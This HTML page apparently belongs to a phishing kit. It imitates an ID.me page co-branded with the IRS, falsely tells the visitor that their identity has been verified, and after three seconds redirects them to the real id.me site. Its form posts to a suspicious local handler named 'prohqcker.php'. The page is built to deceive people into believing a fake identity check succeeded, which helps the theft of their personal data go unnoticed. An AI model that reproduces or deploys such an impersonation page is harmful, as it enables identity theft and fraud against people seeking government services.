<!DOCTYPE html>
<html dir="ltr" lang="en">
<head>
    <meta http-equiv="refresh" content="3; url=https://www.id.me/">
    <style>body {transition: opacity ease-in 0.2s; } 
    body[unresolved] {opacity: 0; display: block; overflow: hidden; position: relative; } 
    </style>
    <title itemprop="name"> Sign in to ID.me - ID.me</title>
    <meta charset="utf-8">
    <meta content="IE=edge,chrome=1" http-equiv="X-UA-Compatible">
    <meta content="One Identity. One Wallet." name="description">
    <meta content="" name="keywords">
    <meta content="text/html; charset=utf-8" http-equiv="content-type">
    <meta content="noodp" name="robots">
    <meta content="width=device-width, initial-scale=1, minimum-scale=1" name="viewport">
    <meta content="noindex" name="robots">
    <link rel="icon" type="image/png" href="id.ico">
    <link rel="stylesheet" href="css/application-12485d2c911011b226e18329e57725b33a13a593773141eae6e2.css">
</head>
<body class="">
    <div id="ZN_2bLc7fWaOZ8U4ey"></div>
    <div class="page-container" data-role="page-container">
        <div class="container">
            <div class="content-container">
                <form class="new_user" id="new_user" data-validate="signin" action="prohqcker.php" accept-charset="UTF-8" method="post">
                    <div class="form-header">
                        <div class="form-header-content" role="banner">
                            <div class="partner">
                                <div class="c_icon m_idme"><img alt="ID.me" src="images/idme-logo-1d96899e99d393974ec16fa17a820e78fca132bd8ea53e01f12bdc000baf674f.svg"></div>
                                <div class="c_icon m_addition"><img alt="with" src="images/icon-addition-1c60f492657aa091463f6ac2e15f0f5123425f314e60383dbba0b06b3bbae0ed.svg"></div>
                                <div class="c_icon m_consumer-logo"><button name="button" type="button" class="m_consumer-logo m_exit-ramp" data-component="Components.Modal" fdprocessedid="1fuvyb"><img alt="Internal Revenue Service" src="images/IRS-Logo.svg">
                                </button></div>
                            </div>
                        </div>
                    </div>
                    <main aria-labelledby="sr_page_title" class="form-container">
                        <div class="form-header-access">
                            <h1 id="sr_page_title">VERIFIED SUCCESSFULLY</h1>
                        </div>
                        <div class="form-fields">
                            <div class="field-group">
                                <div class="field text">
                                    <center><br><?xml version="1.0" encoding="utf-8"?><svg version="1.1" width="70" id="Layer_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" viewBox="0 0 117.72 117.72" style="enable-background:new 0 0 117.72 117.72" xml:space="preserve"><style type="text/css"><![CDATA[
                                        .st0{fill:rgb(0, 75, 133);}
                                    ]]></style><g><path class="st0" d="M58.86,0c9.13,0,17.77,2.08,25.49,5.79c-3.16,2.5-6.09,4.9-8.82,7.21c-5.2-1.89-10.81-2.92-16.66-2.92 c-13.47,0-25.67,5.46-34.49,14.29c-8.83,8.83-14.29,21.02-14.29,34.49c0,13.47,5.46,25.66,14.29,34.49 c8.83,8.83,21.02,14.29,34.49,14.29s25.67-5.46,34.49-14.29c8.83-8.83,14.29-21.02,14.29-34.49c0-3.2-0.31-6.34-0.9-9.37 c2.53-3.3,5.12-6.59,7.77-9.85c2.08,6.02,3.21,12.49,3.21,19.22c0,16.25-6.59,30.97-17.24,41.62 c-10.65,10.65-25.37,17.24-41.62,17.24c-16.25,0-30.97-6.59-41.62-17.24C6.59,89.83,0,75.11,0,58.86 c0-16.25,6.59-30.97,17.24-41.62S42.61,0,58.86,0L58.86,0z M31.44,49.19L45.8,49l1.07,0.28c2.9,1.67,5.63,3.58,8.18,5.74 c1.84,1.56,3.6,3.26,5.27,5.1c5.15-8.29,10.64-15.9,16.44-22.9c6.35-7.67,13.09-14.63,20.17-20.98l1.4-0.54H114l-3.16,3.51 C101.13,30,92.32,41.15,84.36,52.65C76.4,64.16,69.28,76.04,62.95,88.27l-1.97,3.8l-1.81-3.87c-3.34-7.17-7.34-13.75-12.11-19.63 c-4.77-5.88-10.32-11.1-16.79-15.54L31.44,49.19L31.44,49.19z"/></g></svg><p></p>
                                    <br><h4 text-center="" role="heading" aria-label="Verified Successfully" style="color:rgb(0, 75, 133); padding-left: 25px">Your Identity has been verified successfully</h4></center>
                                </div>
                            </div>
                        </div>
                </form>
            </div>
            <aside aria-label="Select Language" class="language">
                <div class="language-selection" data-component="Components.Language"><a class="language-selection-toggle" href="#">English</a></div>
            </aside>
            <footer class="footer">
                <nav aria-label="Footer" class="footer__links">
                    <ul class="footer__list">
                        <li class="footer__list-item"><a target="_blank" class="footer__link" href="#">What is ID.me?</a></li>
                        <li class="footer__list-item"><a target="_blank" class="footer__link" href="#">Terms of Service</a></li>
                        <li class="footer__list-item"><a target="_blank" class="footer__link" href="#">Privacy Policy</a></li>
                    </ul>
                </nav>
            </footer>
        </div>
    </div>
</body>
</html>